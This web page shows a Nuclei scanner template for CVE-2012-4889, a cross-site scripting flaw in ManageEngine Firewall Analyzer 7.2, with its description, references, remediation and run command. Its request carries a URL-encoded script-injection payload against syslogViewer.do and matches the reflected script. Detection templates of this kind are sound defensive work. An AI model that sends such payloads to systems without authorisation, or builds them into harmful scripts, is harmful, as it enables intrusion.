ManageEngine Firewall Analyzer 7.2 - Cross-Site Scripting
ID: CVE-2012-4889
Severity: medium
Author: daffainfo
Tags: cve,cve2012,xss,manageengine,packetstorm
Description
Section titled “Description”Multiple cross-site scripting vulnerabilities in ManageEngine Firewall Analyzer 7.2 allow remote attackers to inject arbitrary web script or HTML via the (1) subTab or (2) tab parameter to createAnomaly.do; (3) url, (4) subTab, or (5) tab parameter to mindex.do; (6) tab parameter to index2.do; or (7) port parameter to syslogViewer.do.
YAML Source
Section titled “YAML Source”id: CVE-2012-4889
info: name: ManageEngine Firewall Analyzer 7.2 - Cross-Site Scripting author: daffainfo severity: medium description: Multiple cross-site scripting vulnerabilities in ManageEngine Firewall Analyzer 7.2 allow remote attackers to inject arbitrary web script or HTML via the (1) subTab or (2) tab parameter to createAnomaly.do; (3) url, (4) subTab, or (5) tab parameter to mindex.do; (6) tab parameter to index2.do; or (7) port parameter to syslogViewer.do. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected user's browser. remediation: | Apply the latest security patch or upgrade to a newer version of ManageEngine Firewall Analyzer. reference: - https://nvd.nist.gov/vuln/detail/CVE-2012-4889 - http://packetstormsecurity.org/files/111474/VL-437.txt - http://www.vulnerability-lab.com/get_content.php?id=437 - https://exchange.xforce.ibmcloud.com/vulnerabilities/74538 - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2012-4889 cwe-id: CWE-79 epss-score: 0.03526 epss-percentile: 0.91568 cpe: cpe:2.3:a:manageengine:firewall_analyzer:7.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: manageengine product: firewall_analyzer tags: cve,cve2012,xss,manageengine,packetstorm
http: - method: GET path: - "{{BaseURL}}/fw/syslogViewer.do?port=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and matchers: - type: word part: body words: - '</script><script>alert(document.domain)</script>'
- type: word part: header words: - text/html
- type: status status: - 200# digest: 480a00453043021f3b903d5a3555712a52db1c3a410c7c3cb5a636487aa551b2c53f7c12f2c8e102205c749e418266982a2a97cb4e3ff064ff149267a4c449c34eba947bba28fbd764:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2012/CVE-2012-4889.yaml"